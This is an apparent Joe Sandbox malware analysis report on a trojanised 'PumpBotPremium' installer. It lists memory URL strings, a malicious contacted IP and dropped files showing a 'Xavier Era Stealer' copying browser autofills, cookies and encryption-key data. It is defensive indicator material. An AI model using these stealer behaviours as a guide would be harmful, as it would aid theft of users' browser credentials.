http://www.cl.cam.ac.uk/~mgk25/iso-time.html	BlockchainConnector.exe, 00000007.00000002.1903874516.0000019A0BC30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
http://www.pcg-random.org/posts/developing-a-seed_seq-alternative.html	BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/pypa/packagingz	BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
https://metacpan.org/pod/distribution/Math-Cephes/lib/Math/Cephes.pod#i0:-Modified-Bessel-function-o	BlockchainConnector.exe, 00000007.00000003.1893654450.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904576783.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000010.00000002.1988393880.0000000005311000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/numpy/numpy/issues/4763	BlockchainConnector.exe, 00000007.00000002.1906764276.0000019A0DD20000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mathworld.wolfram.com/CauchyDistribution.html	BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://brew.sh	BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3	BlockchainConnector.exe, 00000007.00000002.1904772150.0000019A0C630000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	BlockchainConnector.exe, 00000007.00000002.1906683351.0000019A0DBE0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://dashif.org/guidelines/trickmode	BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78981000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://onnx.ai/	BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://software.intel.com/openvino-toolkit)	BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://caffe.berkeleyvision.org	BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://askubuntu.com/questions/697397/python3-is-not-supporting-gtk-module	BlockchainConnector.exe, 00000007.00000002.1906330794.0000019A0D670000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1895215886.0000019A0D66F000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893898051.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	BlockchainConnector.exe, 00000007.00000002.1904176562.0000019A0BF30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
http://www.rfc-editor.org/info/rfc7253	BlockchainConnector.exe, 00000007.00000002.1905324569.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000003.1893700605.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/pyca/cryptography/issues	BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
https://web.archive.org/web/20080221202153/https://www.math.hmc.edu/~benjamin/papers/CombTrig.pdf	BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	BlockchainConnector.exe, 00000007.00000003.1894394899.0000019A0C274000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904480580.0000019A0C2DC000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1895230944.0000019A0C2DB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://mahler:8092/site-updates.py	BlockchainConnector.exe, 00000007.00000002.1905042748.0000019A0C93C000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894056234.0000019A0C938000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893415079.0000019A0C8AF000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
https://github.com/opencv/opencv/issues/21326cv::initOpenEXRD:	BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://optimized-einsum.readthedocs.io/en/stable/	BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy	BlockchainConnector.exe, 00000007.00000002.1904689424.0000019A0C530000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://pyperclip.readthedocs.io/en/latest/index.html#not-implemented-error	BlockchainConnector.exe, 00000007.00000002.1907183150.0000019A14380000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://mouseinfo.readthedocs.io	BlockchainConnector.exe, 00000007.00000002.1907183150.0000019A14380000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://www.cazabon.com	BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
http://www.google.com/index.html	BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/openvinotoolkit/open_model_zoo/blob/master/models/public/yolo-v2-tiny-tf/yolo-v2-	BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://tip.tcl.tk/48)	BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
https://github.com/python/cpython/blob/3.7/Objects/listsort.txt	BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D446000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://pracrand.sourceforge.net/RNG_engines.txt	BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D401000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://xml.org/sax/features/namespacesz.http://xml.org/sax/features/namespace-prefixesz	BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
https://w3c.github.io/html/sec-forms.html#multipart-form-data	BlockchainConnector.exe, 00000007.00000003.1894257723.0000019A09F8E000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1903643435.0000019A09F91000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://stat.ethz.ch/~stahel/lognormal/bioscience.pdf	BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/opencv/opencv/issues/21326	BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.iana.org/time-zones/repository/tz-link.html	BlockchainConnector.exe, 00000007.00000002.1904176562.0000019A0BF30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
https://docs.python.org/%d.%d/libraryNrMc	BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
http://www.ipol.im/pub/algo/bcm_non_local_means_denoising	BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.openblas.net/	BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/	BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
https://www.python.org/	BlockchainConnector.exe, 00000007.00000002.1905042748.0000019A0C93C000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894056234.0000019A0C938000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893415079.0000019A0C8AF000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
https://personal.math.ubc.ca/~cbm/aands/page_83.htm	BlockchainConnector.exe, 00000007.00000003.1894671378.0000019A0D394000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905833021.0000019A0D395000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.python.org/dev/peps/pep-0205/	BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://digitalassets.lib.berkeley.edu/sdtr/ucb/text/34.pdf	BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://arxiv.org/abs/1704.04503	BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://twitter.com/	BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904035119.0000019A0BE30000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://stackoverflow.com/questions/4457745#4457745.	BlockchainConnector.exe, 00000007.00000002.1904176562.0000019A0BF30000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://code.google.com/archive/p/casadebender/wikis/Win32IconImagePlugin.wiki	BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
http://www.ipol.im/pub/algo/bcm_non_local_means_denoising/	BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.pcg-random.org/	BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/opencv/opencv/issues/20833.	BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/pydata/bottleneck	BlockchainConnector.exe, 00000007.00000002.1905113493.0000019A0C9E2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.iana.org/assignments/character-sets	BlockchainConnector.exe, 00000007.00000002.1906683351.0000019A0DBE0000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905556974.0000019A0CE60000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	false		unknown
https://people.eecs.berkeley.edu/~wkahan/ieee754status/IEEE754.PDF	BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D446000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://google.com/mail/	BlockchainConnector.exe, 00000007.00000002.1904576783.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
167.99.214.194	tinyvago.com	United States		14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545725
Start date and time:	2024-10-30 22:04:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PumpBotPremium.msi
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winMSI@28/152@1/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 204.79.197.203, 23.32.185.131
Excluded domains from analysis (whitelisted): www.microsoft.com-c-3.edgekey.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, a-0003.a-msedge.net, oneocsp-microsoft-com.a-0003.a-msedge.net, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, oneocsp.microsoft.com, www.microsoft.com, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
Execution Graph export aborted for target BlockchainConnector.exe, PID 7736 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2756 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7992 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: PumpBotPremium.msi

Simulations

Behavior and APIs

Time	Type	Description
17:05:30	API Interceptor	146x Sleep call for process: powershell.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIGITALOCEAN-ASNUS	z1SWIFT_MT103_Payment_552016_cmd.bat	Get hash	malicious	DBatLoader, FormBook	Browse	178.128.81.239
	B6eg13TpEH.elf	Get hash	malicious	Unknown	Browse	167.174.106.207
	https://assets-usa.mkt.dynamics.com/a915fd66-2592-ef11-8a66-00224803a417/digitalassets/standaloneforms/3d7495e3-e695-ef11-8a69-000d3a3501d6	Get hash	malicious	Mamba2FA	Browse	165.22.49.66
	https://abre.ai/lmHC	Get hash	malicious	Unknown	Browse	167.71.108.29
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	103.253.147.242
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	139.59.170.188
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	103.253.147.242
	V9fubyadY6.exe	Get hash	malicious	Quasar	Browse	164.90.236.65
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	167.71.77.78
	splm68k.elf	Get hash	malicious	Unknown	Browse	178.128.224.218

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd	msupdate.exe	Get hash	malicious	Unknown	Browse
	msupdate.exe	Get hash	malicious	Unknown	Browse
	win6.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse
	SecuriteInfo.com.Win64.DropperX-gen.9519.23032.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.DropperX-gen.9519.23032.exe	Get hash	malicious	BazaLoader	Browse
	Wetransfer.exe	Get hash	malicious	Python Stealer	Browse
	SecuriteInfo.com.FileRepMalware.10144.24483.exe	Get hash	malicious	Discord Token Stealer	Browse
	SecuriteInfo.com.W64.S-e4cd4610.Eldorado.25276.12705.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Python.Agent-LZ.32136.12177.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Python.Agent-LZ.23397.22787.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd	msupdate.exe	Get hash	malicious	Unknown	Browse
	msupdate.exe	Get hash	malicious	Unknown	Browse
	win6.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse
	SecuriteInfo.com.Win64.DropperX-gen.9519.23032.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.DropperX-gen.9519.23032.exe	Get hash	malicious	BazaLoader	Browse
	Wetransfer.exe	Get hash	malicious	Python Stealer	Browse
	SecuriteInfo.com.FileRepMalware.10144.24483.exe	Get hash	malicious	Discord Token Stealer	Browse
	SecuriteInfo.com.W64.S-e4cd4610.Eldorado.25276.12705.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Python.Agent-LZ.32136.12177.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Python.Agent-LZ.23397.22787.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\5c7179.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	8528
Entropy (8bit):	5.52863077276191
Encrypted:	false
SSDEEP:	96:t2ubSBogwxkevyp3oj5UKwXSTCsThqa5UKwXSTC6jGBrcThqrH6SC5optD5u/W79:t2ub2omeqejyKwiOI9yKwiOYdGJc8MpW
MD5:	75CA0AC6E08990C6C1D0F694A6FAC49F
SHA1:	996B135E6D40F9498EA86F6F973AD78D080C3DE1
SHA-256:	0CB79492C9A4FBF65D2EF9817FF7844DF5E5E5582B99860C7918E12EC755A797
SHA-512:	879E2DBAD3E448D1BFF2372911B74BC701891F63BBDB26F8BC1BFE3AD9B96A4C6B7C10D8FA18E448A3337D43C71DD6B5BD071161947000F8573AE154E814A918
Malicious:	false
Preview:	...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{26BCD435-D353-42A0-8C43-818FC0FA354F}..PumpBotPremium..PumpBotPremium.msi.@.....@.....@.....@........&.{7FFEF896-5843-4272-ACBA-A4977C267D92}.....@.....@.....@.....@.......@.....@.....@.......@......PumpBotPremium......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{90615BD6-7F96-483E-9146-350C31DE947E}&.{26BCD435-D353-42A0-8C43-818FC0FA354F}.@......&.{517BF6FB-31C5-4EEA-993C-02A1296FF8EB}&.{26BCD435-D353-42A0-8C43-818FC0FA354F}.@......&.{DF9A949B-1C3B-4A84-A210-70F3FFF5F910}&.{26BCD435-D353-42A0-8C43-818FC0FA354F}.@........CreateFolders..Creating folders..Folder: [1]#.1.C:\Program Files (x86)\Coinsw.app\PumpBotPremium\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....X.Software\Caphyon\Advanced Installer\Prereqs\{26BCD435-D353-42A0-8C43-818FC0FA354F}\1.0.0...@....(.&...BlockchainCo

C:\Config.Msi\5c717b.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	403
Entropy (8bit):	5.027413295973521
Encrypted:	false
SSDEEP:	6:Ea3LMJle/YeXrKWV9ontIaVtIpllBlyTtD/R1cgmll/d6tIDldsuRkYRsj9Yq:Eg6OBxVVlFydR1cj//dddft2/
MD5:	DE280BA29E2553BDB4400994C819A290
SHA1:	5B683E785CEB0A7DB59DA55A8E5AEC77B8054101
SHA-256:	D1ACF2A924E60F3220117B937C61C14F652A859764FF033ED8988C339D1A1D84
SHA-512:	9AB9DB64A794DAFE299FB43352DEE51D6EA2F1E7E8D5C4D574AB0965757D670C9D2E1A09F39BC36B7A5A2219BBB68C6399F7CD455B0B663C7D94CA70390E8FF4
Malicious:	false
Preview:	...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{26BCD435-D353-42A0-8C43-818FC0FA354F}..PumpBotPremium..PumpBotPremium.msi.@.....@.....@.....@........&.{7FFEF896-5843-4272-ACBA-A4977C267D92}.....@.....@.....@.....@.......@.....@.....@.......@......PumpBotPremium......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....AI_LaunchChainer...@.....@.....@....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	5.440603014622264
Encrypted:	false
SSDEEP:	24:3iT0cYRSKco4KmBs4RP8jKzkmAmoUebIKo+mZ9tJBJt/NK3R8IHrVrU:y4xRSU4y4RYdmloUeW+mZ9tJBLNWR8Iq
MD5:	97B2C963B73058663B06488DC365C5AF
SHA1:	8CDE80387BC88B0BC11A8EEF99EB6D749DCF16A8
SHA-256:	74F2950B7ADD4808EC431FA0A018429F476C0427B08C6C04BD5EC30ABC05F9E3
SHA-512:	EBFA19AC044E982C5B1E18D36A041A73C5B3376FCB58DD5BE39280806227F4532712E151235521309BAD0D4CD90124453B8B805C3BE552A47688EA7841F52754
Malicious:	false
Preview:	@...e.................................R..............@..........L...............h..t...D.d.u.........!.Microsoft.PowerShell.ScheduledJob...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............i..VdqF...\|...........System.Configuration<................t.,.lG....M...........System.Management...4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Command

C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Chrome_Default_AFILLS.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	819
Entropy (8bit):	3.169800290625281
Encrypted:	false
SSDEEP:	24:7TTdHjRbbX1H1+1X1H1fP8rza10U91RLp:7FV1H1+1X1H1f910e1Vp
MD5:	568BF4C24CC9BE86E51183E870F38D10
SHA1:	878E3F560051D1AE86A26D22A887441191129855
SHA-256:	65E4C146E4C87CE59602E3D2E752472C52F005DA5122057369EAC8C6FA96A5FD
SHA-512:	7E99F74459B8A390B35E8F650AB338AAF7EF39BB598BAD60B4503EF2157BE2CDC9237A457E8140D3E69ACA261DBD6BB8A8D59A0001CD147CBBC88AABE8C1386F
Malicious:	false
Preview:	.... ... ... ...... ... ..................... .. ................... ........................ ...... ........... ............ .......... ...... ............ ............. .......... .... ...... ... ....... .............. ..... ... ...... ... ..... .............. ....... XAVIER ERA STEALER \| V2.71..

C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Edge_Default_AFILLS.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	819
Entropy (8bit):	3.169800290625281
Encrypted:	false
SSDEEP:	24:7TTdHjRbbX1H1+1X1H1fP8rza10U91RLp:7FV1H1+1X1H1f910e1Vp
MD5:	568BF4C24CC9BE86E51183E870F38D10
SHA1:	878E3F560051D1AE86A26D22A887441191129855
SHA-256:	65E4C146E4C87CE59602E3D2E752472C52F005DA5122057369EAC8C6FA96A5FD
SHA-512:	7E99F74459B8A390B35E8F650AB338AAF7EF39BB598BAD60B4503EF2157BE2CDC9237A457E8140D3E69ACA261DBD6BB8A8D59A0001CD147CBBC88AABE8C1386F
Malicious:	false
Preview:	.... ... ... ...... ... ..................... .. ................... ........................ ...... ........... ............ .......... ...... ............ ............. .......... .... ...... ... ....... .............. ..... ... ...... ... ..... .............. ....... XAVIER ERA STEALER \| V2.71..

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	66646
Entropy (8bit):	6.044576597568136
Encrypted:	false
SSDEEP:	1536:k8Tc32bwS8Oa6nviYQkiEZQiaWh9emCgfXJ9Uu:k8bJznvi61e8fIu
MD5:	BEEB299F37F7FB5E83199C87E7D12EDA
SHA1:	D77E47377D802C79BD8C0B87B1E9F0520A6A9864
SHA-256:	06FEBBBE692878AD3433329A9155B08A1E0A5EC68152AD6B03A552FB39DACD46
SHA-512:	911E4E566B7663D7EF504B77A60B60C4F060C01CF451D6EF40F4D370F20194354B31FF3FFB8223DE22166DC522DDFE5912523EBF5A474F7A6621A3EB95EDF56F
Malicious:	false
Preview:	{"browser":{"first_run_finished":true,"first_run_study_group":"EnabledE-5","shortcut_migration_version":"117.0.5938.132"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"app_bound_fixed_data":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAG7I4XamucEiJgTIvWNrX8QAAAAACAAAAAAAQZgAAAAEAACAAAACz9LIY/Sft4sF7BR0/+RlMXu9lhIRI5BaZTSQpyRPpLAAAAAAOgAAAAAIAACAAAADpL4/Y0/1c7GfAyejoQlHrWIfhufkrSTaxhr33kLRaiGABAABCz7EyQ+8ml1FxjRqtgyeWwLLZ2IHAzJeD0JnWN0wZz313G7DGWg+UAsBKIMQy5yoFT6uS18pLOAyaJXxUDloUrKvqu51HeVrnYHoVb8WT7jb6PiSZemofWqeToVsJHvtWDZt5T3cRsPTFluK+ErdhV/M4aslTfHhHU5oOdEFpJOJjtEggjyvy+1z4MfOSzFQSR/yUPtVqL11Kienypq7Pfce/sgXQVyQx5HJtARkiij5S80SSAzlX7odXphhcK8KFY7RZq5/8tF3h6DjBHxi9tJQHjyUkWUars8S2pxC2nfARqxQF3hsXBSGhzpXzBeEyndaMlhVfFQG+uOvLDxv6WWNzrjY/N23xyPWDnjICFAZ1Phbd/J/YvjpTb6AiXnSITx3SZj6TKb6dLBr9boJsB8rSYGXCaHgO5j6IZBvlJWu9yNA8rR4b0hxpmRkM7XxuKP

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_cookies.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
